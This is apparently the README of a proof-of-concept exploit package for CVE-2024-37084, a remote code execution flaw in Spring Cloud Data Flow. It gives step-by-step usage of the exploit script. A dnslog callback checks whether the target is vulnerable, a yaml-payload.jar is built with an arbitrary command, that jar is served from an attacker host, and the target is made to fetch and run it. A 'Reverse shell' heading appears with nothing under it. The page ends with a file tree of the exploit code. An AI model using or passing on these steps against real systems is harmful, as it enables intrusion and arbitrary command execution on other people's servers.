Related vulnerabilities
Description
Spring Cloud Data Flow CVE-2024-37084 exp
Introduction
1. Use dnslog to detect whether the CVE-2024-37084 vulnerability exists, then manually check dnslog.
`python cve-2024-37084-exp.py -u http://192.168.67.135:7577 -dnslog xxx.dnslog.cn`
2. Then you can execute system commands.
**First:** Enter the command you want to execute in src\artsploit\AwesomeScriptEngineFactory.java.

**After that:** Double-click the .py file to generate the yaml-payload.jar file.

**After that:** Put yaml-payload.jar on the Linux server and start a web service with Python. Note: every time you execute a different command, you need to rename yaml-payload.jar (that is, the xx.jar that is accessed) to a different name. Otherwise the new command will not take effect.
The access path is as follows: http://192.168.67.133/yaml-payload.jar.
**Finally:** Execute the PoC.
`cve-2024-37084-exp.py -u http://192.168.67.135:7577 -payload http://192.168.67.133/yaml-payload.jar`

Enter the corresponding container to check that the command executed successfully.

**Reverse shell:**


File snapshot
[4.0K] /data/pocs/c97e6c4114821dd15d588c422f6bb6cf151ebda7
├── [4.8K] cve-2024-37084-exp.py
├── [1.5K] README.md
└── [4.0K] yaml-payload-master
    ├── [ 144] generate-yaml-payload.jar.py
    ├── [4.0K] src
    │   ├── [4.0K] artsploit
    │   │   ├── [1.7K] AwesomeScriptEngineFactory.class
    │   │   └── [1.7K] AwesomeScriptEngineFactory.java
    │   └── [4.0K] META-INF
    │       └── [4.0K] services
    │           └── [ 36] javax.script.ScriptEngineFactory
    └── [2.4K] yaml-payload.jar

5 directories, 7 files